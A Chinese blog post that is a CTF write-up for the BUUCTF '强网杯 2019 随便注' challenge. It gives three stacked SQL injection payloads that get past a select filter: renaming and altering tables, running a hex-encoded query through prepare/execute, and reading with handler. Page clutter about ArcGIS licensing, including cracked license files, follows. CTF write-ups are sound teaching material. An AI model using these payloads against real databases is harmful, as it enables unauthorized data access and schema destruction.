buuctf[强网杯 2019]随便注 1(超详细,三种解法)

最新推荐文章于 2025-04-11 15:47:45 发布
最新推荐文章于 2025-04-11 15:47:45 发布
阅读量414 收藏 7
点赞数 3
分类专栏: 程序员 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84968940/article/details/138748764
版权

后台SQL查询语句应该是:
select * from words where id=
所以说只能先查询id字段,然而另一个表只有一个flag字段是肯定爆不了flag的,并且类型为varchar字符串类型,而恰巧words数据表里面的data也是varchar类型,因此从这里就可以得到做题思路,通过rename函数进行改表,把1919810931114514改为words,增加新字段id,将flag改为data,将刚开始那个words表改为其他任意表。
构造payload:
1';rename table words to BaiMao;rename table 1919810931114514 to words;alter table words add id int unsigned not NULL auto_increment primary key;alter table words change flag data varchar(100);#

rename修改表名
alter修改已知的列
add增加
int整数类型
unsigned无符号类型
not null- 指示某列不能存储 NULL 值。
primary key - NOT NULL 和 UNIQUE 的结合。指定主键,确保某列(或多个列的结合)有唯一标识,每个表有且只有一个主键。
auto_increment-自动赋值,默认从1开始。

成功回显flag:
image.png
注意没有回显flag,就类似于你更新了个东西但是没刷新,重新在文本框里面输入1提交即可回显flag。

第二种解法 编码逃逸 绕过滤

由于select被过滤,考虑使用编码进行绕过
使用select查询就很简单了
构造payload
select *from where 1919810931114514``(注意这里使用反引号把这个数字包括住,md编辑器打不上去)
*号查询数据表里面的全部内容,这就是爆出flag的原理
进行16进制编码加密
73656c656374202a2066726f6d20603139313938313039333131313435313460
最终payload:
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

  • prepare…from…是预处理语句,会进行编码转换。
  • execute用来执行由SQLPrepare创建的SQL语句。
  • SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
  • 0x就是把后面的编码格式转换成16进制编码格式
  • 那么总体理解就是,使用SeT方法给变量a赋值,给a变量赋的值就是select查询1919810931114514表的所有内容语句编码后的值,execsql方法执行来自a变量的值,prepare…from方法将执行后的编码变换成字符串格式,execute方法调用并执行execsql方法。
    参考:https://blog.youkuaiyun.com/qq_44657899/article/details/10323914

回显flag:
image.png

第三种解法 handler代替select

select命令被过滤了怎么办?我们还可以用handler命令进行查看,handler命令可以一行一行的显示数据表中的内容。
构造payload:
1'; handler 1919810931114514open asa; handler a read next;#

handler代替select,以一行一行显示内容
open打开表
as更改表的别名为a
read next读取数据文件内的数据次数

上传payload,回显flag:
image.png

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

https://bbs.youkuaiyun.com/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

ArcGIS风暴】Win10操作系统ArcGIS许可License无法启动的解决方法汇总(绝对成功!)
「 刘一哥与GIS的故事」
11-22 1万+
文章目录1. 关闭Windows Defender2. 关闭系统防火墙3. 删除迈克菲(McAfee)杀毒软件4. 在系统服务中启动安装ArcGIS软件,最重要的一步是许可服务的正常启动,通常,由于各种各样的原因,ArcGIS许可管理器License Manager十有八九会无法启动,点N多次都没反应,如果许可服务不能如愿启动的话,即使Desktop安装成功,也是无法打开的。本文汇总了Win10操作系统之上ArcGIS安装过程中可能会导致服务无法启动的原因及解决办法ArcGIS安装参考教程:
ArcGIS微课1000例】0091:License服务无法启动权威解决办法
「 刘一哥与GIS的故事」
10-27 1万+
安装ArcGIS软件,最重要的一步是许可服务的正常启动,通常,由于各种各样的原因,ArcGIS许可管理器License Manager十有八九会无法启动,点N多次都没反应,如果许可服务不能如愿启动的话,即使Desktop安装成功,也是无法打开的。另外,电脑刚开机ArcGIS License Server是稍候启动,可能会遇到打不开的情况,只要稍等片刻就可以正常打开。ArcGIS安装在win10系统上较为常见,服务无法启动的主要原因是遇到系统防火墙、杀毒软件等的阻止。ArcGIS安装参考教程:《
ARCGIS Server Manager打不开的解决方法
小小单线程
08-12 1万+
首先,在运行窗口输入 services.msc来打开服务项。 然后找到ArcGis ServerArcgis License Manager,将其设置为自动。 然后重新打开ArcGIS Server Manager即可正常运行。 原文链接:ARCGIS Server Manager打不开的解决方法,转发请注明来源!
ArcGIS Server 10.2.2+许可文件下载介绍
最新发布
gitblog_06755的博客
04-11 554
ArcGIS Server 10.2.2+许可文件下载介绍 【下载地址】ArcGISServer10.2.2许可文件下载介绍 ArcGIS Server 10.2.2 是一款功能强大的地理信息系统服务器软件,专为企业级应用设计,能够高效发布和管理地图、地理数据及分析服务。本项目提供该版本软件及其配套许可文件,帮助用户快速...
ArcGIS License Server点击启动没反应,许可管理器无法启动怎么办
GIS蒲公英的博客
08-27 1万+
4 当我们再打开ArcGIS License Server Administrator的候。3 在【服务】中找到【ArcGIS License Manager】双击。无法启动ArcGIS License Server的情况。在使用ArcGIS的过程中,我们经常会遇到。专注GIS领域知识分享,交流行业软件技巧。欢迎关注,不定期分享GIS各种问题和技巧。1 右击我的电脑——【管理】服务状态——启动,确定即可。启动类型选择——自动。
arcgis license server启动未响应无法启动解决办法
qq_43740943的博客
07-23 8395
arcgis license server启动未响应无法启动解决办法
Arcgis 10.2.2 | arcgis license server无法启动解决办法
跳动的喵尾巴
07-04 4万+
arcgis 10.2.2 license server启动无响应的解决方案
ArcGIS10.2 License许可点击启动无响应的解决办法
the_best_me_andu的博客
09-14 2万+
提供ArcGIS10.2 License许可点击启动无响应的【临解决办法。通过cmd命令行,手动启动License安装目录bin文件下的service.txt文件。
ArcGIS10.6“License许可启动无响应”解决方法
纯粹,学术,热爱。
03-07 1万+
电脑防火墙组织 license server启动,关闭电脑防火墙重启电脑将 “license administrator” 加入防火墙的允许运行列表中,对于找不到该项服务,可以通过点击右下角的 “允许其他应用”,并将本地电脑 “license administrator” 所在路径加载进来。
ArcGIS10.2 许可License点击始终启动无响应的解决办法及正常启动的前提
木易GIS的博客
01-24 2639
ArcGIS10.2 许可License点击始终启动无响应的解决办法及正常启动的前提
arcgis server 10.4许可文件.ecp
06-22
arcgis server 10.4许可文件.ecp GIS的底图一直使用金字塔技术进行切图,使用户能够快速访问指定级别的地图者影像。但是切图本身是一张图片,无法进行交互。于是又引入了矢量图层用来显示矢量点线面,这通常需要先...
解决arcgis10.1的license启动失败
03-13
解决license无法启动问题 1、检查安装license是否是crack下的可破解版 2、检查service.TXT是否已替换,用户名是否已更改、文件是否完整.....
arcgis许可服务器不运行,ArcGIS许可服务管理器无法启动问题解决方法
weixin_39657575的博客
07-29 2万+
ARCGIS安装真的很考验人的耐心,经常性会在安装过程中出错误,本来这个软件安装就比较慢,一旦出了错误还需要全部退回进行别的尝试,真的让人很恼火。有ArcGIS安装完,打开许可服务管理,会发生点了一下没反应,再点一下就未响应,再再点一下就卡死了的情况,等一段间之后发现仍然处于启动,这个问题困扰了我很久,所以写下来这篇文章来记录一下解决方法。方法一:第一步:windows键+R 输入cm...
ArcGisLicense Service Administrator 启动服务无响应
weixin_45628042的博客
03-16 3801
日常使用arcgis10.2,打开软件报错,猜测服务关闭。随即启动License Service Administrator启动服务,一直无响应状态,记录并解决问题。
史上最全Arcgis安装,解决license启动不成功等问题(一次成功)
taveryang的博客
07-27 2万+
Arcgis安装过程中主要是License启动这一步容易失败,一定要注意细节,按照文章顺序进行安装一定能够成功,加油!
ArcGIS许可管理器License server administrator无法启动的解决方法
热门推荐
撼沧
01-07 12万+
ArcGIS许可管理器License server administrator无法启动的解决方法在安装ArcGIS软件,甚至日常使用启动软件ArcGIS许可管理器License Manager经常会无法启动,点多少次都没反应,更别谈往后的破解了。这里谈一下自己遇到问题后用过的能用的方法。
ArcGIS10.2 License许可点击启动无响应
u011630325的博客
04-28 1375
尝试多种方式,发现前期已经替换掉的 service.txt 丢失,直接找到和谐包里面的文件进行替换即可。无需重新安装 service.txt。
Arcgis license 服务无法启动的解决问题
韶光
04-25 11万+
1.检查服务开没开。打开资源管理器然后按照下面就出现了。也可以打开运行——servces.msc,者从控制面板进入服务。这个候再试一试启动是否成功。 2.如果不成功就打开任务管理器里的服务一项,停掉lmgrd.exe的服务,以及Arcgis的所有服务;然后进入license安装文件bin,右键开启arcgis.exe,这个要等一会儿任务管理器上的服务才会显示。如果任务管理器
Arcgis10.2.2安装过程中ArcGIS license Server Administrator(许可服务器管理员)无法启动解决办法
ZhangGNSS的博客
12-19 4424
进行安装,在重新启动ArcGIS license Server Administrator(许可服务器管理员)导入许可无法启动,点击启动没有反应。部分与自己电脑主机名不一致,更改为自己电脑主机名后即可成功点击启动,导入许可。搜索了一些解决办法,但都没有效果,最后查看破解文件中的。查看主机名可参见此链接。文件发现,文件第三行。
arcgis license server无法启动远程协助‘’
03-18
### 关于ArcGIS License Server无法启动的解决方案 当遇到ArcGIS License Server无法启动的情况,可以从以下几个方面排查并解决问题: #### 1. **检查网络配置** 确保License Server所在的计算机能够被其他客户端正常访问。如果是在局域网环境中部署了ArcGIS Server Local,则需要确认该环境下的网络设置是否允许远程连接AO组件[^1]。 #### 2. **验证服务状态** 检查ArcGIS Server Object Manager (SOM) 的运行情况。通常情况下,在Host SOM机器上需将此服务更改为由本地系统账户登录,并重启相关服务来恢复其正常工作流程[^2]。 #### 3. **审查日志文件** 查看ArcGIS License Manager的日志记录,寻找任何可能指示错误原因的信息。这些日志可以帮助识别具体是什么阻止了许可服务器的成功初始化。 #### 4. **权限问题** 确认用于启动ArcGIS License Server的服务账号具有足够的权限执行所需操作。这包括但不限于读取/写入特定目录的权利以及与其他必要进程通信的能力。 #### 5. **软件版本兼容性** 保证所使用的ArcGIS产品及其依赖项之间存在良好的版本匹配度。不一致可能会导致意外行为完全失败激活license server的功能。 #### 示例代码片段:修改服务登录身份 以下是更改Windows服务登录凭据的一个简单PowerShell脚本例子: ```powershell $serviceName = "ArcGISServerObjectManager" $newUsername = ".\LocalSystemUser" # 替换为实际用户名 $newPassword = ConvertTo-SecureString "" -AsPlainText -Force Set-Service -Name $serviceName -StartupType Automatic New-ServiceCredential -ServiceName $serviceName -Account $newUsername -Password $newPassword Restart-Service -Name $serviceName ``` 上述脚本仅作为示范用途,请依据实际情况调整参数值后再实施。 --- ###
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值